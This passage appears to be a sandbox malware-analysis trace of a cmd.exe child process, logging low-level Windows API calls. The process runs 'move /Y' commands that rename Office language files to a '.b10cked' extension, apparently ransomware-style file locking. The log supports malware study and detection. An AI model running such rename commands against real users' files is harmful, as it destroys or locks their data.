lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegCloseKey (hKey=0x40) returned 0x0 [0156.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7cc | out: phkResult=0x18e7cc*=0x40) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x40, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x1, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x0, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x4, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x4) returned 0x0 [0156.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7d4, lpData=0x18e7d8, lpcbData=0x18e7d0*=0x1000 | out: lpType=0x18e7d4*=0x0, lpData=0x18e7d8*=0x9, lpcbData=0x18e7d0*=0x1000) returned 0x2 [0156.178] RegCloseKey (hKey=0x40) returned 0x0 [0156.178] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637e [0156.178] srand (_Seed=0x5b88637e) [0156.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" [0156.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"" [0156.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0156.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0156.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0156.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0156.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0156.179] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0156.179] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0156.179] GetEnvironmentStringsW () returned 0x212360* [0156.179] FreeEnvironmentStringsW (penv=0x212360) returned 1 [0156.180] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.180] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0156.180] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0156.180] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0156.180] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0156.180] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0156.180] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0156.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0156.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f598 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f598, lpFilePart=0x18f594 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f594*="Desktop") returned 0x18 [0156.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.180] FindClose (in: hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.184] FindClose (in: hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.184] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314) returned 0x2109f0 [0156.185] FindClose (in: hFindFile=0x2109f0 | out: hFindFile=0x2109f0) returned 1 [0156.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0156.185] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0156.185] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0156.185] GetEnvironmentStringsW () returned 0x210210* [0156.185] FreeEnvironmentStringsW (penv=0x210210) returned 1 [0156.185] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.186] GetConsoleOutputCP () returned 0x1b5 [0156.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.186] GetUserDefaultLCID () returned 0x409 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="0") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6d8, cchData=128 | out: lpLCData="1") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0156.186] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0156.187] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0156.187] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0156.188] GetConsoleTitleW (in: lpConsoleTitle=0x200930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.188] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0156.188] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0156.189] _wcsicmp (_String1="move", _String2=")") returned 68 [0156.189] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0156.189] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0156.189] _wcsicmp (_String1="IF", _String2="move") returned -4 [0156.189] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0156.189] _wcsicmp (_String1="REM", _String2="move") returned 5 [0156.189] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0156.194] GetConsoleTitleW (in: lpConsoleTitle=0x18f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0156.194] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0156.194] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0156.194] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="CD") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0156.194] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="REN") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0156.194] _wcsicmp (_String1="move", _String2="SET") returned -6 [0156.194] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0156.194] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0156.194] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="MD") returned 11 [0156.194] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0156.194] _wcsicmp (_String1="move", _String2="RD") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0156.194] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0156.194] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0156.194] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0156.195] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0156.195] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0156.195] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="VER") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0156.195] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0156.195] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0156.195] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0156.195] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0156.195] _wcsicmp (_String1="move", _String2="START") returned -6 [0156.195] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0156.195] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0156.195] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0156.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.197] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0156.197] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f18c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f184, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f184*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0156.197] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0156.198] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0156.199] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0156.199] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0156.199] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0156.199] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~2.trx")) returned 0x2020 [0156.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x211f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0156.199] SetErrorMode (uMode=0x0) returned 0x0 [0156.199] SetErrorMode (uMode=0x1) returned 0x0 [0156.199] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb14, lpFilePart=0x18eafc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", lpFilePart=0x18eafc*="ONINTL~2.TRX") returned 0x3c [0156.199] SetErrorMode (uMode=0x0) returned 0x1 [0156.199] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0156.200] _wcsicmp (_String1="ONINTL~2.TRX", _String2=".") returned 65 [0156.200] _wcsicmp (_String1="ONINTL~2.TRX", _String2="..") returned 65 [0156.200] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl~2.trx")) returned 0x2020 [0156.200] SetErrorMode (uMode=0x0) returned 0x0 [0156.200] SetErrorMode (uMode=0x1) returned 0x0 [0156.200] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18ef90, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", lpFilePart=0x18ed28*="ONINTL~2.TRX") returned 0x3c [0156.200] SetErrorMode (uMode=0x0) returned 0x1 [0156.200] SetErrorMode (uMode=0x0) returned 0x0 [0156.200] SetErrorMode (uMode=0x1) returned 0x0 [0156.200] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f198, lpFilePart=0x18ed28 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x18ed28*="ONINTL.REST.trx_dll.b10cked") returned 0x4b [0156.200] SetErrorMode (uMode=0x0) returned 0x1 [0156.200] SetLastError (dwErrCode=0x0) [0156.200] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll.b10cked")) returned 0xffffffff [0156.200] GetLastError () returned 0x2 [0156.200] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e6a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6a4) returned 0x212130 [0156.201] FindNextFileW (in: hFindFile=0x212130, lpFindFileData=0x18e6a4 | out: lpFindFileData=0x18e6a4) returned 0 [0156.202] GetLastError () returned 0x12 [0156.202] FindClose (in: hFindFile=0x212130 | out: hFindFile=0x212130) returned 1 [0156.204] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x211cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x211cc0) returned 0x212130 [0156.204] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0156.204] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0156.204] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll")) returned 0x2020 [0156.204] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\onintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0156.207] FindClose (in: hFindFile=0x212130 | out: hFindFile=0x212130) returned 1 [0156.207] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8f0 | out: _Buffer=" 1") returned 9 [0156.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.207] GetFileType (hFile=0x7) returned 0x2 [0156.208] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0156.208] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e87c | out: lpMode=0x18e87c) returned 1 [0156.208] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8b0 | out: lpConsoleScreenBufferInfo=0x18e8b0) returned 1 [0156.209] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0156.209] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e8f0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0156.209] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8d4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8d4*=0x1a) returned 1 [0156.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.209] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0156.209] _get_osfhandle (_FileHandle=1) returned 0x7 [0156.210] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0156.210] _get_osfhandle (_FileHandle=0) returned 0x3 [0156.210] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0156.210] SetConsoleInputExeNameW () returned 0x1 [0156.210] GetConsoleOutputCP () returned 0x1b5 [0156.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0156.210] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.210] exit (_Code=0) Process: id = "260" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21551 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21552 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21553 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21554 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 21555 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21556 start_va = 0x77230000 end_va = 